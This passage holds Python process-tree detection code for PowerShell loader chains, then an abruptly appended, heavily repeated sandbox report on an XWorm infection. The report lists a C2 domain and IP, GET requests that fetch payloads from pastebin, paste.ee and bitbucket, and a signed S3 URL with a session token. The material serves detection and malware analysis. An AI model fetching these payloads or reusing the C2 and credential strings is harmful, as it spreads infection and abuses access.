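    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(names))


def evaluate(events):
    """Return (pid, finding) pairs for suspicious parent/child pairs and command-line markers."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else None   # unknown parent -> None
        if parent_name in SCRIPT_HOSTS and child == "powershell.exe":
            findings.append((e["pid"], "script_host_spawns_powershell"))
        if parent_name == "powershell.exe" and child in DOTNET_HOSTS:
            findings.append((e["pid"], "powershell_spawns_dotnet_host"))
        for name, pattern in CMDLINE_INDICATORS.items():
            if pattern.search(e["cmd"]):
                findings.append((e["pid"], name))
    return findings


if __name__ == "__main__":
    for pid, finding in evaluate(EVENTS):
        print(pid, finding, " > ".join(chain(EVENTS, pid)))
```

Note the split between the two PowerShell events: the encoded stage (PID 6100) trips only the `FromBase64String` and glyph-substitution markers, while every URL, TLS and assembly-load marker lives in the decoded child (PID 6400). A rule set that only inspects the outermost command line, or only the one that spawned the script host's child, misses half of the picture; the parent/child relationship is what ties the two together.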

                Networking

                Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 46.246.14.3:7000 -> 192.168.2.5:49712
                Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 46.246.14.3:7000 -> 192.168.2.5:49712
                Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49711 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49728 -> 188.114.96.3:443
                Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.5:49711
                Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 188.114.96.3:443 -> 192.168.2.5:49728
                Source: Malware configuration extractor | URLs: toskaadmx.duckdns.org
                Source: unknown | DNS query: name: pastebin.com
                Source: unknown | DNS query: name: paste.ee
                Source: unknown | DNS query: name: toskaadmx.duckdns.org
                Source: Yara match | File source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: global traffic | TCP traffic: 192.168.2.5:49712 -> 46.246.14.3:7000
                Source: global traffic | HTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1 Host: pastebin.com
                Source: global traffic | HTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1 Host: pastebin.com
                Source: global traffic | HTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1 Host: pastebin.com
                Source: global traffic | HTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1 Host: pastebin.com
                Source: global traffic | HTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox View | IP Address: 104.20.4.235 104.20.4.235
                Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.20.4.235:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 104.20.4.235:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49725 -> 104.20.4.235:443
                Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 104.20.4.235:443
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-4b91-b2b1-19798dd254b2/dsadsdsadsadsa.txt?response-content-disposition=attachment%3B%20filename%3D%22dsadsdsadsadsa.txt%22&AWSAccessKeyId=ASIA6KOSE3BNKASUWRVB&Signature=GfpU0CqDcq625CnXQ2BwtNOiGJM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEG0aCXVzLWVhc3QtMSJHMEUCIQDs8Rj4z4voHrA56yVpXNvb%2FsFKDQyxi%2B3o3W5qfuWusQIgLqQzvBFMFXX9Pa%2BoyIG%2B32jske%2BWh0S25%2Fynj2NB%2BBcqsAIItv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDMxhE6dop%2BJnHoLfPiqEAr8pHVnooTfi0YZkbhehEoaE1HM1hw7hoHIkopPIOTznsgPJgLmSVn4zaLDAXaFsXvcbpwil5pqs3yLuDuXNAyT6tr7PxdlycD%2FAJaRj7XgTxDLyt2nktlqdkRlEDXnBOTxrFM34uHRZq4gQIcXM%2FdeP1gNTHuVllr4hqgc8BtyPI0oFU6TWGdV61p4JgXiTcM8X%2Fs7Y2pNAaZQaYh1Kwk80bLwXYNBkJqe6fudHaku2Hr19n%2FI7ovUAmCunSxhwXenqzPnDzZTCwFDsnRaZo0mTJvCImTLI6KCQcZQtPWh0Q7P%2BZ8u6QsTrnfwdgKJJpE7FElvkKACOC6bBrj07%2FazaST1qMKXB%2BLcGOp0BIzHMRr4XYnUMQ24ozLJjMYALd1nwf%2BbKAue7hm%2By1s%2B%2BelqorxCz52uzxR1zc6F5j%2F8PF66cEvqBdIobKudxk1ywppJrtepYoNJnvllkE9hTI8QXxVteGCBkiJsAP%2FwcJyEvw%2F8tqq%2BqrHSmpzW1WfCLDgcVz0pN3lJ4qUXWCuGKKTowMYT2jHITFCxnZ3ZkBJiJdBr0Pb07j%2BtQIw%3D%3D&Expires=1727932333 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/sFgsbG3v HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /raw/cD7bJS7b HTTP/1.1Host: pastebin.com
                Source: global trafficHTTP traffic detected: GET /d/lHbHo/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/V9y5Q5vv HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: global traffic | DNS traffic detected: DNS query: paste.ee
                Source: global traffic | DNS traffic detected: DNS query: toskaadmx.duckdns.org
                Source: powershell.exe, 00000004.00000002.2176643102.000002870058A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D692B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: HTTPS://PASTEBIN.COM/RAW/CD7BJS7B
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bitbucket.org
                Source: powershell.exe, 0000000E.00000002.2401200406.00000272D4974000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsofto
                Source: powershell.exe, 00000004.00000002.2176643102.000002870195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://firebasestorage.googleapis.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701A14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2254576347.000002871007F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E23D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2150319912.000002C0E229F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D3ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7D48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2578721401.00000272E6413000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CBAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2507053683.0000027C1CCE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E40D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.000002870164D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D79FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A00000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
                Source: powershell.exe, 0000000E.00000002.2396453856.00000272D48DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/V9y5Q5vv
                Source: powershell.exe, 00000004.00000002.2270156438.000002877C720000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com/raw/v9y5q5vv
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
                Source: powershell.exe, 00000002.00000002.2293886906.0000019BAE651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5AD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2133813473.000002C0D384B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0E2E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 0000000F.00000002.2352027899.0000027C0E386000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2293886906.0000019BAE670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2293886906.0000019BAE6BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2133813473.000002C0D2221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2615790449.000001A1A5A16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D63A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2352027899.0000027C0CB31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazoh
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazohx
                Source: powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/5c1faa65-8df1-44b3-9eef-4905cfb21066/downloads/153f1b3b-a7e8-
                Source: powershell.exe, 00000004.00000002.2176643102.0000028700443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.comp
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D7A69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D678B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txt
                Source: powershell.exe, 00000004.00000002.2176643102.00000287016B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/89999999999999/acaaaaaaaaa/downloads/dsadsdsadsadsa.txtP
                Source: powershell.exe, 00000004.00000002.2176643102.000002870168C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287003E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.0000028701721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7AD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D7A3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D6782000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                Source: powershell.exe, 00000004.00000002.2176643102.00000287003CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2176643102.00000287005BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D695C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2403141075.00000272D676A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
